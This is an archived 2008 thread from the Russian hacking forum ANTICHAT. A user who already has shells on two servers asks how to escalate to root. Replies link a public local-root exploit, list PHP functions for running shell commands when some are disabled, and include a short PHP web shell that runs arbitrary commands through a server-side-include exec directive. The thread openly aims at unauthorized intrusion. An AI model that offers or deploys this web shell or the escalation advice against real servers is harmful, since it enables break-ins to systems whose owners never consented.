ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

21.04.2008, 23:14
|
|
Познающий
Регистрация: 12.11.2007
Сообщений: 94
Провел на форуме: 4789789
Репутация:
71
|
|
Поднятие прав
Имеются 2 шелла, нужно поднять права до рута
1) uid=48(apache) gid=48(apache) groups=48(apache),100(users)
Linux zeus 2.6.18-8.1.4.el5 #1 SMP Thu May 17 03:26:03 EDT 2007 i686 i686 i386 GNU/Linux
2) uid=768443(site) gid=203435(pg587717) groups=203435(pg587717)
Linux nerds 2.4.32-grsec+f6b+gr217+nfs+a32+fuse23+tg+++opt+c8+gr2b-v6.194 #1 SMP Tue Jun 6 15:52:09 PDT 2006 i686 GNU/Linux
Help.
|
|
|

21.04.2008, 23:19
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме: 8042357
Репутация:
3742
|
|
TheSoul 2ое врядли, во первых gr secured, во вторых однно из последних 2.;.* ветки
а первое сопкойно рутается http://milw0rm.com/exploits/5092
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
|
|
|

22.04.2008, 11:42
|
|
Постоянный
Регистрация: 06.12.2006
Сообщений: 321
Провел на форуме: 1536533
Репутация:
370
|
|
Для выполнения, насколько я помную, должены стоять с обоих сторон команды `` (обратный апостроф, находится там же где и тильда).
|
|
|

22.04.2008, 11:45
|
|
Banned
Регистрация: 18.04.2008
Сообщений: 8
Провел на форуме: 65191
Репутация:
48
|
|
обратный апостроф это в перле =\
print `uname`
хотя может и в пшп есть, я хз
Ershik, ещё есть passthru, exec, shell_exec, popen
Последний раз редактировалось Спайдер; 22.04.2008 в 11:49..
|
|
|

22.04.2008, 11:47
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме: 9751379
Репутация:
3812
|
|
Сообщение от Спайдер
обратный апостроф это в перле =\
print `uname`
Ershik, ещё есть passthru, exec, shell_exec, popen
врёте сударь=\
http://ru2.php.net/manual/ru/language.operators.execution.php
обратные ковычки равноценны shell_exec()
ещё есть pcntl_exec и proc_open
__________________
|
|
|

22.04.2008, 11:49
|
|
Banned
Регистрация: 18.04.2008
Сообщений: 8
Провел на форуме: 65191
Репутация:
48
|
|
+toxa+, омг, я не успел отредактировать =)
на самом деле пшп я почти не знаю, вот и наврал)
|
|
|

22.04.2008, 12:13
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме: 1325167
Репутация:
100
|
|
Все нужно по типу:
так и делал. Все запрещено..
|
|
|

22.04.2008, 14:54
|
|
Banned
Регистрация: 18.04.2008
Сообщений: 8
Провел на форуме: 65191
Репутация:
48
|
|
омг
|
|
|

22.04.2008, 16:44
|
|
Участник форума
Регистрация: 19.03.2008
Сообщений: 108
Провел на форуме: 1357043
Репутация:
137
|
|
если можешь менять файл можешь через ccи попытатся
https://forum.antichat.ru/showpost.p...32&postcount=9
я написал себе этот маленкий шелл для этого
PHP код:
<?php
if ($handle = @fopen("./a.shtml", 'w'))
{ @fwrite($handle, '<!--#exec cmd="'.$_POST['a'].'"-->'); }
echo '<form name="a" method="post" action="">
<textarea name="textarea" id="textarea" cols="121" rows="24"> ';
@include("http://".$_SERVER['HTTP_HOST'].rtrim(dirname($_SERVER['PHP_SELF']),'/\\')."/a.shtml") ;
echo ' </textarea><input type="text" name="a" id="a"><input name="input" type="submit"></form> ';
?>
Последний раз редактировалось nicusor; 22.04.2008 в 17:03..
|
|
|

22.04.2008, 19:14
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме: 1325167
Репутация:
100
|
|
Точнее можете расписать, что с этим делать? сси использовать как "перл"-файл?
Для начала я засунул скрипты себе на хостинг, вашим скриптом воспользоваться не могу.
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|